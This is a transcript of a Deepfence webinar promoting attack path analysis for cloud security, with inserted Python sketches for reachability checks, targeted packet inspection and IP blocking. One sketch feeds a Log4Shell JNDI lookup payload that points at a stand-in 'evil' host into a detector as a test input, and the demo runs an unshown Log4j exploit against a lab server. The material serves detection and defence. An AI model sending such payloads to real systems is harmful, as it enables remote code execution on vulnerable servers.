All right. Hi, everyone. Welcome to today's webinar hosted by Deepfence. Today's topic is understanding attack paths: the key to alert fatigue reduction and better remediation. I'm Ryan Smith, head of product and solutions at Deepfence. With me today I have Shyam Krishnaswamy, our Chief Technology Officer. Welcome, Shyam. Appreciate you joining us today. Hi, Ryan. Hello, everyone.

I wanted to start with what we think is an unprecedented set of security challenges that companies face when they move into hybrid, multi-cloud environments, or even single-cloud environments, because the landscape of those environments has changed drastically: the types of infrastructure and hosting services available to you, the differentiation between IaaS, PaaS, and SaaS within the cloud, and the demands of the different hosting requirements you might have. This new complexity within cloud environments, whether it comes from infrastructure complexity or application complexity, has required new detection methods for what we're deploying.

That has led to tool proliferation within cloud environments. Security teams have, on average, 75 security tools that they've bought. If you go through the categories, workload protection, firewalls, CASB, CSPM tools, you quickly realize how many tools you have within your own security ecosystem and budget. All of these tools are generating alerts, to the tune of more than 500 public cloud security alerts daily that are reviewed by SOCs. People have to respond to these: they have to confirm they're not false positives, and they have to validate every alert they see. And because teams have limited resources, limited time, limited money, and limited subject matter expertise, they're missing alerts. They're swivel-chairing between 75 apps and reviewing alerts with the limited staff that they have. 55% of organizations have reported missing key alerts and security incidents, whether daily, weekly, or hourly. So half of the companies out there are missing critical security incidents daily due to alert fatigue.

It doesn't just impact our security posture, though; it impacts our resourcing, our people, and our efficiency within security operations. 62% of organizations have said that alert fatigue has caused turnover within their staff. And we already know that security engineers, SOC professionals, and analysts are some of the hardest staff to find in today's market, so organizations are losing critical staff due to alert-fatigue turnover that they can't hire back quickly enough. 30 hours out of a 40-hour week of a security analyst within the SOC is spent triaging alerts. That leaves just 10 hours of the normal 40-hour work week for higher-value activities such as detection and response, incident remediation, forensics, threat intelligence analysis, and security engineering. All of these other key functions of a SOC go underserved because we're dealing with alerts all day, and that causes burnout, fatigue, and turnover. But there's hope here.
The statistics, the research, the data indicate that with proper risk prioritization, and what we mean by that is not just identifying vulnerabilities but evaluating them according to their exploitability within the environment, 97% of the alerts we get from our security tooling can be eliminated. That 30 hours a week of triage turns into one hour a week, and it opens up so much more potential for our security teams to contribute in positive ways to our security, risk, and compliance posture.

So we're really excited to dive into this topic today, because we think cloud security needs a bit of a reset. As we've seen, alert fatigue is off the charts, and it's actively hurting your security resources and teams. Adding more tools and more software to the equation doesn't help; it just creates more silos and more fragmentation within our security alerting and our detection and response. So how do we break free of this Sisyphean endeavor of rolling the boulder up the hill? That brings us to the topic of today's webinar: attack path identification, management, and analysis. Adding more context to the security scans and results we're getting in our environment ultimately leads to better risk reduction and the ability to remediate those alerts with the proper controls. You can better situate where your controls are needed within the environment, so you're effectively spending your security resources, whether those are technology resources or people resources.

Deepfence approaches this question of how to identify attack paths by creating what we call the ThreatGraph. The Deepfence ThreatGraph, available across our product suite, adds runtime context to the security capability within your environment. What we mean by that is: we don't just scan your environment for where risk is. We do identify what vulnerabilities you have, where you might have malware, exposed secrets, or misconfiguration issues that could lead to cloud breaches. But we also add what we know about the runtime context of the application's deployment in the cloud, such as netflow information and who is talking to whom, to determine which of those vulnerabilities, malware instances, exposed secrets, and misconfigurations is actually exploitable by a threat actor, and to help you map the actual attack path they would take to exploit that vulnerability.

The example we always give, and Shyam is going to show this later in the demo, is that you might have two machines on the network that are both affected by a zero day like Log4Shell in Log4j, which we were all worried about last Christmastime. When you're thinking about remediating an environment that might have thousands of instances of Log4Shell, like our customers, it's important to know which instances are actually attackable. So what Deepfence would do in that scenario is evaluate not only whether Log4Shell is in memory on that asset or endpoint, but whether a threat actor could actually make the JNDI-to-LDAP server connection necessary to achieve the remote code execution they want as the outcome of exploiting that vulnerability.
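To make that JNDI-to-LDAP check concrete, here is a minimal sketch. This is not Deepfence's implementation (which derives reachability from observed netflow rather than active probing); the hostnames and ports are illustrative, and the probe is just a crude stand-in for the exploitability question being described.

```python
# Hypothetical sketch: can this host make the outbound LDAP connection a
# JNDI lookup would need? A reachable instance is a live attack path; an
# unreachable one can be deprioritized. Hostname/port are illustrative.
import socket

def can_reach_ldap(target_host: str, port: int = 389, timeout: float = 3.0) -> bool:
    """Return True if an outbound TCP connection to an LDAP port succeeds."""
    try:
        with socket.create_connection((target_host, port), timeout=timeout):
            return True
    except OSError:
        return False

if can_reach_ldap("attacker-ldap.example.com"):
    print("JNDI-to-LDAP egress possible: treat this Log4Shell instance as exploitable")
else:
    print("no LDAP egress observed: deprioritize relative to reachable instances")
```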
And if we can identify that attack path for you, we can eliminate all of the instances of Log4Shell in your environment that don't have that particular attack path open. In a zero-day scenario, when you're scrambling to remediate your environment and find out whether you've already been hit, this allows you to prioritize where to put protections, where to put remediation efforts, and where to spend your people resources, rather than focusing on the 97% of other instances that have that vulnerability but aren't actually exposed or attackable given how a threat actor would use a particular tactic, technique, or procedure. It also allows you to remediate those attack paths, which brings us full circle to how this enables better remediation: in those scenarios, we can put appropriate controls and coverage on the assets that have that attack vector available, at the choke points.

We're going to come back to these two screens, but I wanted to go into how this reduces alert fatigue and improves remediation, and then we'll get into a little of how we do it. When we look at this threat graph, what it actually does for an environment is take all those instances of unique vulnerabilities you might have, that is, all those instances of Log4Shell within the environment, and reduce them to a list of the vulnerabilities that are actually exploitable, then rank the exploitable vulnerabilities by severity, whether they have exploits available, and CVSS score. This gives you your hit list of which vulnerabilities you actually need to remediate, based on their accessibility and exploitability within your environment. Here you can see we have about a 60% reduction in this particular environment, particularly in the high and critical vulnerabilities, which is where most of your vulnerability management teams spend their efforts.

So we've reduced the time spent here, we've reduced the effort on attack paths that aren't actually viable, and we've put the focus on what I call the choke points within the environment, which ultimately helps accelerate your security operations. If we can remediate along these top-level attack vectors, which might have other underlying assets, nodes, pods, and images beneath them, we can eliminate those classes of attacks. This enables fairly standard project management behavior for security operations teams: project management teams use different weightings, and one of the most common is smallest effort, greatest impact. If we can identify the high-value targets within the environment via these attack vectors, then our remediation efforts become that smallest effort with the biggest impact on security risk within our environment.
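Here is a minimal sketch of the "hit list" idea just described: filter findings down to the exploitable ones, then rank by exploit availability and CVSS score. The field names and sample data are illustrative, not Deepfence's schema.

```python
# Hypothetical sketch: reduce all findings to the network-reachable ones,
# then rank by known-exploit availability, breaking ties on CVSS descending.
from dataclasses import dataclass

@dataclass
class Finding:
    cve_id: str
    cvss: float                # 0.0-10.0
    exploit_available: bool    # known public exploit exists
    network_reachable: bool    # derived from runtime/netflow context

def hit_list(findings: list[Finding]) -> list[Finding]:
    # Only network-reachable findings are candidate attack paths.
    exploitable = [f for f in findings if f.network_reachable]
    return sorted(exploitable, key=lambda f: (f.exploit_available, f.cvss), reverse=True)

findings = [
    Finding("CVE-2021-44228", 10.0, True, True),    # Log4Shell, reachable
    Finding("CVE-2021-44228", 10.0, True, False),   # same CVE, no open path
    Finding("CVE-2022-0001", 6.5, False, True),
]
for f in hit_list(findings):
    print(f.cve_id, f.cvss, "exploit available" if f.exploit_available else "no exploit")
# Only 2 of 3 findings survive the filter; remediation starts at the top.
```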
And so this ultimately leads to better remediation within the environment, what we call security observability, because you get real-time visibility of those assets and a continuous assessment of their security posture based on real runtime context. That allows you to make better project management decisions around resource allocation: where do I put certain security controls, where do I spend on security controls (which often come in a consumption model), and where do I target my people resources for patching efforts, remediation efforts, or forensics and response in a zero-day scenario where I've already been impacted or exploited. And ultimately it helps us ensure compliance, because all of this is continuous rather than point-in-time static snapshots of our environment, so it allows better upkeep of these things in real time.

So, once again, what is the key to security observability and attack path identification? For us, it's these four pillars that converge. Unless you're adding these four contextual pillars to your environment, you're just getting vulnerabilities ranked by severity and CSPM results ranked by severity, and you're seeing all of these things in different platforms that force you to swivel-chair. It's like putting together a puzzle while missing four pieces: in the end you'll have an incomplete picture of the true coverage of the attack, or of what happened, because these data points live in different systems, they don't share the same context about what's happening in the environment, and they're captured at different points in time.

For Deepfence, we always think about measuring and contextualizing the attack surface of the environment with network flow information, cloud metadata, and vulnerability, CSPM, and malware scan results, putting all of this within a single platform and system, and evaluating what comes in and what goes out of an environment. This is true traffic analysis and deep packet inspection, but targeted deep packet inspection, because doing deep packet inspection across all north-south and all east-west traffic, all the time, would not only be resource-, time-, and money-intensive for your infrastructure, it just wouldn't be effective from the standpoint of prioritizing how we spend our security resources. That analysis of what comes in and what goes out lets us identify what's changed within the cloud, the applications themselves, the traffic, and process behavior, leading to better security decisions. Deepfence ultimately provides you a platform built on context. We talked about alert fatigue earlier in the conversation; this is why alert fatigue happens in the first place. All of these fundamental controls, data analysis, and environment coverage, all of that complexity, needs to be housed within a single platform and system that ultimately provides better security observability, attack path identification, and then remediation and coverage of the digital attack surface within our enterprise environments.

The last thing I'll cover is the alert fatigue benefit, that 97% reduction, which helps us converge along these items: less triaging, so that 30 hours a week becomes an hour a week.
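A minimal sketch of what "targeted" deep packet inspection can look like: rather than capturing all east-west and north-south traffic, sniff only the ports where processes flagged by the attack graph listen, and flag suspicious payloads. This uses the scapy library; the ports and indicator string are illustrative, and this is not Deepfence's inspection engine.

```python
# Hypothetical targeted DPI sketch: a BPF filter restricts capture to the
# ports of flagged processes, keeping inspection overhead low.
from scapy.all import sniff, IP, TCP, Raw

VULNERABLE_PORTS = {8080, 8443}   # listeners flagged by the attack graph
SUSPICIOUS = b"${jndi:"           # crude Log4Shell indicator

def inspect(pkt):
    # Only inspect TCP packets that carry a payload.
    if pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw):
        if SUSPICIOUS in bytes(pkt[Raw].load):
            print(f"possible JNDI lookup: {pkt[IP].src} -> port {pkt[TCP].dport}")

bpf = " or ".join(f"tcp port {p}" for p in sorted(VULNERABLE_PORTS))
sniff(filter=bpf, prn=inspect, store=False)
```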
So for your average SOC employee, you're saving roughly $1,500 a week in people costs on triage alone. These cost savings, whether from consolidating all of those critical cloud alerts and contextual data points into a single platform, or from reducing the people cost of managing the alert fatigue that comes with traditional security systems, mean that platforms that approach risk reduction with attack path analysis can save up to 45 business days a year on average, roughly $300,000 a year. And that's significant, particularly in tougher economic times, when we're thinking about the ROI of our security decisions. We really think that approaches built around attack path analysis matter to the cost and time picture as well.

I'm going to dive into a demo, but I do think we have one question, which was about sources for the statistics. Yes, we can provide the sources in the notes of the PowerPoint when we send out the slides; the figures come from various studies, and each is cited in the notes.

So we wanted to shift today's webinar to a demo of how attack path analysis affects remediation. Shyam is going to show two systems within Deepfence and the differences that make attack path analysis important. Shyam, over to you.

Thank you, Ryan. Hello everyone. Thank you for joining us today. We heard Ryan talk about what an attack path is, why it's important, and how it works. So let's look at attack paths from a different perspective: what do we do next? Now that we have built an attack path, now that we have looked at various vulnerabilities, secrets, malware, and compliance scans across cloud services, what do we do with it? What do we want to do with it? How does the attack path help us achieve better security? I'm going to share my screen, and we're going to look at an attack path within our platform, then see what would happen if somebody tries to take advantage of some of the exposed vulnerabilities, and how we can protect ourselves when someone tries to exploit them. I hope you're all able to see my screen.

Here is the attack path that exists within a sample demo environment. This attack path, as I said, uses various vulnerabilities, secrets, and scans across the various cloud services to build up the attack path. In a little more detail, let's look at some of the other results that feed into this attack path. For example, here is a set of vulnerabilities available to us from various vulnerability scans. In particular, we're going to take the vulnerability scans for a container to illustrate this attack path. Let's take the vulnerability scans on our WordPress/MySQL sample vulnerable application. As a first step, we look at the vulnerability scan results: their CVSS score, their reachability, what Ryan explained in the previous part of the discussion. I have a vulnerability; is it really exploitable? There needs to be a set of multiple factors in place for this vulnerability to actually be exploited. The most obvious one is: is this vulnerability network reachable? Does this vulnerability have any known exploit?
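As a back-of-the-envelope check of the savings figures above: the hourly rate and team size below are our assumptions, not numbers from the webinar; the 30-hours-to-1-hour triage reduction is the figure quoted earlier.

```python
# Worked arithmetic behind the ~$1,500/week and ~$300k/year claims, under
# assumed inputs (HOURLY_RATE and TEAM_SIZE are illustrative assumptions).
HOURLY_RATE = 52.0              # assumed fully loaded analyst cost, USD/hour
TEAM_SIZE = 4                   # assumed SOC analyst headcount
hours_saved_per_week = 30 - 1   # triage drops from 30 h/week to 1 h/week

weekly = hours_saved_per_week * HOURLY_RATE
print(f"~${weekly:,.0f}/week per analyst")        # ~$1,508, matching ~$1,500
annual_team = weekly * 48 * TEAM_SIZE             # ~48 working weeks/year
print(f"~${annual_team:,.0f}/year for the team")  # ~$289,536, near the ~$300k figure
```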
What happens next when this vulnerability exists within my system? Deepfence, by default, provides a way to categorize all these vulnerabilities and answer the question of whether each vulnerability is indeed exploitable. And to do that, Deepfence adds context. As Ryan explained earlier in his session, adding context to any issue that we find helps us prioritize it. As we can see from the lab, just by adding context, just by being able to understand the nature of each vulnerability, we are able to bring the list down to a number where we can understand what we need to fix first. Now, this is for vulnerabilities; similarly, we bring in the secrets and the results for the other problem classes to build out this attack graph.

Just a while ago, we discussed the results of various vulnerability scans being fed into this attack graph. Here's a sample. As you can see, there is a sample container here where a bunch of vulnerabilities have been identified as exploitable and as having a path to be exploited. The reason this container features here, but not the other MySQL or WordPress containers, is simply that those containers' vulnerabilities are not directly exploitable. In addition, the Deepfence platform is able to understand context here, meaning the vulnerabilities that exist within this container can be reached through another container. So the platform is not only able to add runtime context; the runtime context is also meaningful in explaining how these vulnerabilities could be exploited and what the path to exploiting them is. This runtime observation gives us the ability to plot all of this for the users of the platform, so they can focus on the issues that really matter.

So, as we saw, we did have vulnerabilities on a few other containers, but the fact that those vulnerabilities are not reachable, or belong to a different class of exploitability, is how we were able to build up this attack graph. Now we have built the attack graph, we have looked at the various risks within our environment, and we have added runtime context into all of this to get here. So here comes the next important part: what do we do with this? The most obvious answer is that we have provided a tool for the security operations program to start their remediation process. But as most of us know, remediation is not a one-day, one-time effort; it is a continuous process. During that continuous process, how do we ensure that the vulnerabilities that do exist in the system are not exploited? This is where the runtime piece of the platform comes into play. What happens is as follows. Ryan spoke about being able to focus and target our efforts at understanding what comes in and what goes out across the whole infrastructure. So we go back here, we look at the system that the container is running on, and we start east-west and north-south traffic analysis on that system. As an aside, you can always use the various APIs that we provide within this platform to start the same east-west, north-south deep packet inspection.
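Here is a minimal sketch of the cross-container reachability idea just shown: a container's vulnerabilities only land on the attack graph if observed network edges connect an internet-facing node to that container. The topology and container names are illustrative, not taken from the demo environment.

```python
# Hypothetical sketch: breadth-first search over observed runtime connections
# (e.g. from netflow) to decide which vulnerable containers are exposed.
from collections import deque

edges = {
    "internet":     ["wordpress"],
    "wordpress":    ["mysql"],
    "mysql":        [],
    "batch-worker": [],          # vulnerable, but nothing routes to it
}
vulnerable = {"mysql", "batch-worker"}   # containers with CVE findings

def reachable_from(start: str) -> set[str]:
    """Return every node reachable from `start` via observed connections."""
    seen, queue = {start}, deque([start])
    while queue:
        for nxt in edges.get(queue.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen

exposed = vulnerable & reachable_from("internet")
print("on the attack graph:", sorted(exposed))   # -> ['mysql']
# batch-worker's findings drop off the graph: vulnerable, but not reachable.
```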
So let's take a quick look at what we mean by east-west, north-south deep packet inspection. Earlier on, Ryan spoke about being able to target our efforts. So what we do is look at the various processes within our system, find those processes that are receiving traffic, and start inspecting what comes in and what goes out, the two important pillars of security observability, on those processes that really matter. As a sample here, we have started traffic inspection on these two processes, just two processes within the whole system. And we classify that traffic against a set of attack categories and classifications of the various events within your system. For example: I am receiving a remote payload; is it a recon attempt on my system? I am receiving a payload that is clearly a SQL injection attack. These are the various categories and classifications within the overall threat landscape.

Now that we have started this east-west, north-south packet inspection, it helps us build up and understand the various alerts and events that happen in our system. It lets us look at the very low-level payloads that come into our system, like the one I am showing here. So what happened was: we built the attack graph, we then started east-west, north-south packet inspection, and we were able to see low-level information on what's going on and on the various attempts to exploit those vulnerabilities, secrets, malware, or misconfigurations within our infrastructure.

Going above and beyond this, we would also like a platform like this to protect us from these kinds of exploitation. To that extent, we let you set security policies. Here's an example of a security policy set within the system: a traffic security policy that says, if a malicious payload is seen on the network, go ahead and block the sender of that traffic. We are able to set various security policies, and I'm going to quickly show an attempt to exploit one such vulnerability. We did see the Log4j vulnerability come up in our attack path, and we also saw some previous attempts to exploit it. Here is a security policy we have set that will stop any such attempt to exploit that vulnerability.

Now, let me go ahead and run an exploit, and we will see how we are able to block it. I have an exploit prepared here; let me quickly show its contents. It's a standard Log4j exploit, and I'm going to start it. Once I start the exploit, I see a response here, and you will see that further communication attempts to this server are completely blocked. For example, if I do a curl again to the same IP address, I am blocked, because a protection policy has been set, and as you see here, the IP address has been blocked for the next 10 minutes. Here is a log that just came into my system: a protection policy has been set and it has been enforced. So this is the whole sequence: we are able to prioritize our remediation efforts, and we are also able to prioritize our protection efforts.
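A minimal sketch of the "block the sender for 10 minutes" behavior shown in the demo. This is not Deepfence's policy engine: it simply pairs a payload match with a temporary iptables drop rule. It requires root, and the IP addresses are examples.

```python
# Hypothetical sketch: on spotting a Log4Shell-style payload, drop all
# traffic from the sender, then lift the rule after a 10-minute window.
import subprocess
import threading

BLOCK_SECONDS = 600           # the 10-minute window from the demo
SUSPICIOUS = b"${jndi:"       # crude Log4Shell indicator

def block_sender(src_ip: str) -> None:
    """Insert a DROP rule for src_ip and schedule its removal."""
    rule = ["INPUT", "-s", src_ip, "-j", "DROP"]
    subprocess.run(["iptables", "-I", *rule], check=True)
    print(f"protection policy enforced: {src_ip} blocked for {BLOCK_SECONDS}s")
    threading.Timer(
        BLOCK_SECONDS,
        lambda: subprocess.run(["iptables", "-D", *rule], check=False),
    ).start()

def on_payload(src_ip: str, payload: bytes) -> None:
    if SUSPICIOUS in payload:
        block_sender(src_ip)

# A subsequent curl from the blocked IP now fails until the rule expires.
on_payload("203.0.113.7", b"GET / HTTP/1.1\r\nX-Api: ${jndi:ldap://evil/a}\r\n")
```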
We are able to set effective policies that help us block the senders of such malicious attacks. Back to you, Ryan, to continue the discussion.

Perfect. Appreciate that, Shyam. Thank you for contextualizing everything we talked about previously. It's always better, at least from my perspective, to see these things in action rather than just a bunch of stats and slides. So I really appreciate the hands-on look at how Deepfence deals with attack path identification and how we use it to better target remediation efforts for our customers in the cloud. It's great to see that live blocking of a zero-day scenario based on traffic analysis.

I'm just going to bring up one more slide, and then we can get into any additional questions people might have. We always want to share with you the ability to try out Deepfence now. We're loved by our community: we have over 5,000 stars across our products on GitHub. If you'd like to go to our GitHub and star any of our repos, we'd appreciate that love and support if you thought what you saw here today was cool. You can get started with our products via the Get Deepfence link on our homepage. And if you want to further engage with our community, read product documentation, get tips and tutorials, or check out our Slack channel, click that last link, which will take you to our community page for further engagement.